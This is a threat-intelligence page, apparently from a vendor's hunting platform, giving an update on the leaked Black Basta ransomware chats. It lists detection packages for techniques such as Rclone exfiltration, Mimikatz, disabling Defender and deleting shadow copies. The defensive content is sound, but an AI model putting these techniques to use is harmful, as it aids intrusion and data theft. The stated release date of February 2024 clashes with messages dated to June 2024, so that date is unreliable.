Threat Overview - Black Basta Update
UPDATE 03/04/2025: A significant leak of internal chat logs from within Black Basta ransomware group has provided the community with a glimpse into their operations, including further information regarding their capabilities, tools and motivations. It was released via JSON file on February 11, 2024 by a Telegram user named ExploitWhispers, and contained around 200,000 chat messages dated between September 2023 and June 2024. Black Basta is considered one of the most impactful Ransomware groups of recent years, and this event rivals the 2022 leaks that affected the Conti ransomware gang in 2022. With newly discovered information uncovered due to these leaks, threat hunters at Intel 471 have updated the collection with newly uncovered TTPs (Tactics, Techniques and Procedures).
Titan References:
Malware Campaign: Qbot returns with new lures and links to Black Basta
Actor builds team to conduct ransomware attacks, seeks reliable operators
Black Basta (aka BlackBasta) ransomware group members reveal operational details
Related Hunt Package: Black Basta Emerging Threat Collection
Get your FREE Community Account today on the HUNTER Platform and get access to behavioral threat hunting content for your SIEM, EDR, NDR, and XDR platforms!
Related Hunt Packages
Rclone Activity - Potential Data Exfiltration
Rclone is a command-line tool used to manage (and potentially exfiltrate) files on cloud storage. A larger number of ransomware cases have been uncovered where Rclone has been utilized to exfiltrate files off of victim machines.
Suspicious Scheduled Task Created - Execution Details Contains Scripting Reference
This content is designed to detect when scripting references are found in scheduled tasks. Malware and adversaries use this technique to maintain persistence on a compromised system.
WMIC Windows Internal Discovery and Enumeration
This will identify the potentially malicious use of WMI (Windows Management Interface) utilized for local enumeration and discovery of a host.
Autorun or ASEP Registry Key Modification
A common method that adversaries and malicious software alike achieve persistence is by adding a program to the startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder allows the referenced program to be executed when a user logs in. They are often utilized for legitimate purposes, however when utilized maliciously the key name/value is often obviously suspicious, such as random names, or objects loaded from temp or public folders.
Microsoft Defender Antivirus Disabled via Registry Key Manipulation (Powershell ScriptBlock Logging Detection)
This package is designed to identify when Microsoft Defender Antivirus is disabled through manipulation of the DisableAntiSpyware registry key by changing the value from a 0 to a 1 via Powershell commandlets.
Powershell Command Used to Stop VM on Hyper-V Host - Potential Ransomware Precursor
This Threat Hunt Package is meant to identify the use of powershell to stop all vms on a Hyper-v Host. This technique is often a precursor to ransomware being deployed, so it can properly encrypt the target data.
Potential Abuse of Built-in Network Tools for Network and Configuration Discovery
Searches for multiple LOLB network discovery and configuration tools being run in a short period of time. This indicates an attacker attempting to perform network discovery of assets that are reachable, as well as the local configuration of the system.
Potential Exfiltration - Common Rclone Arguments
This will identify processes executed with common arguments associated with rclone activity used to exfiltrate.
Living Off The Land Technique - Esentutl.exe
This package is designed when the Microsoft Windows native binary esentutl.exe is used to perform actions that may be abnormal and possibly malicious.
Excessive Windows Discovery and Execution Processes - Potential Malware Installation
This package utilizes a list of commonly abused LOLB which an attacker or malware would execute in quick succession. The presence of multiple executions of the programs within the list can be indicative of an infection or malicious activity occurring on a victim host. To reduce false positives, distinct counts per process name can be utilized to ensure over 5 unique processes from the list were executed versus just checking more than 6 events were generated on the host.
Mimikatz Non-Interactive Execution
This package will identify when a Mimikatz payload has been executed on a system as one-liner likely to output to a file for collection. This is not the standard way Mimikatz is typically run, but adversaries still execute it in this fashion.
Usage of chmod to Enable Execution - Potential Payload Staging
This hunt package identifies instances where the 'chmod' command is used to modify file permissions, specifically focusing on changes that grant executable rights. By correlating these events with user contexts and known file paths, the package aims to highlight potentially malicious activities, such as the preparation of a system for exploitation or the setup of persistence mechanisms by unauthorized users.
Rundll32 Run Without Arguments
Rundll32 running without any command-line arguments is very anomalous and should be investigated. This can be indicative of malicious activity.
Remote Services - SMB Share mounts/admin shares/scanning
This use case detects when shares are mapped via "net.exe" within command line. More specifically, hidden administrative shares that can be mapped and used to remote file copy malicious files and/or executables.
Microsoft Defender Antivirus Disabled via Registry Key Manipulation (CommandLine Execution)
This package is designed to detect when Microsoft Defender Antivirus is disabled through manipulation of the DisableAntiSpyware registry key by changing the value from a 0 to a 1. It focuses on the commandline arguments that are executed to modify the registry key.
Suspicious Scheduled Task Created - Encoded PowerShell Payload Executed From Registry
This package is intended to identify when a scheduled task command is executed to create a task utilizing PowerShell to execute a base64 encoded payload that has been stored in the Windows Registry.
Atera Agent utilized for Unauthorized Remote Access
This package identifies when the Atera Agent is installed for remote connectivity by looking for key registry values or command line arguments used to install and register the agent to an unauthorized account. This package uses different artifacts in order to identify this behavior. Check out the 'Deployment Requirements' section for each tool in order to understand the limitations or requirements. NOTE: Queries will require to put your business name into the query parameters if your organization utilizes Atera.
RDP Enabled Via NETSH
This hunt package is designed to capture the activity surrounding commandline arguments being executed in order to enable Remote Desktop Protocol (RDP).
Remote WMI Command Attempt
This hunt searches for wmic.exe being launched with parameters to operate on remote systems. This could uncover an attacker abusing WMI functionality, in order to potentially perform remote executions or to simply gather information.
Suspicious bcdedit Activity - Potential Ransomware
BCDEdit is a command-line tool for managing Boot Configuration Data (BCD). Ransomware is known to utilize bcdedit to modify the boot configuration to prevent recovery. The intent of this package is to identify when bcdedit is being utilized with several common malicious commands, such as delete and safeboot.
Local Data Staging - ADFind.exe
This content has been designed to identify when ADFind.exe is staging data, possibly for exfil, on a local resource.
Excessive Windows Discovery CommandLine Arguments - Potential Malware Installation
This content is designed to detect when the same discovery tool (ifconfig.exe, netstat.exe, ping.exe) is executed in quick succession that contains different arguments and strings.
Microsoft Defender Antivirus Disabled via Registry Key Manipulation
This content is designed to identify when Microsoft Defender Antivirus is disabled through manipulation of the DisableAntiSpyware registry key or by modifying how Microsoft Defender will respond to threats based by changing the configuration through registry keys.
Suspicious Child Process - Calc.exe
This use case is meant to identify when calc.exe contains a child process other than calc.exe. Calc.exe containing a child process other than itself should be considered abnormal, and could be indicative of process injection or other malicious activity.
Shadow Copies Deletion Using Operating Systems Utilities
Ransomware is known to delete Windows shadow copies before it begins encrypting the data on the victim host. This tactic is typically carried out with powershell, vssadmin or wmic. This package identifies activity by powershell, wmic, vssadmin or vssvc with command line arguments containing delete and variations of shadow.
Regsvr32 Running Files from Temp Directories
This Hunt Package is designed to identify files executed (such as DLLs) from a temporary directory by regsvr32.exe. This LOLB is often abused to proxy execution or launch malicious applications/malware.
AnyDesk Execution from Abnormal Folder - Potential Malicious Use of RMM Tool
Anydesk is a common and widely utilized tool for remotely controlling machines. However, it has also been adopted by many actors to remotely access victim machines and deploying malware or ransomware payloads. This Hunt Package is designed to exclude common paths where AnyDesk is executed from. Due to AnyDesk being able to be installed or executed from nearly any directory, Analysts should review whether AnyDesk is allowed, and follow internal policies if it is not authorized. Some common "red flag" type directories can be temporary directories, ProgramData and System32. Additionally, to appear more legitimate, some attackers may utilize installation paths that include legitimate sounding names, such as "Microsoft Management" or "Customer Service"
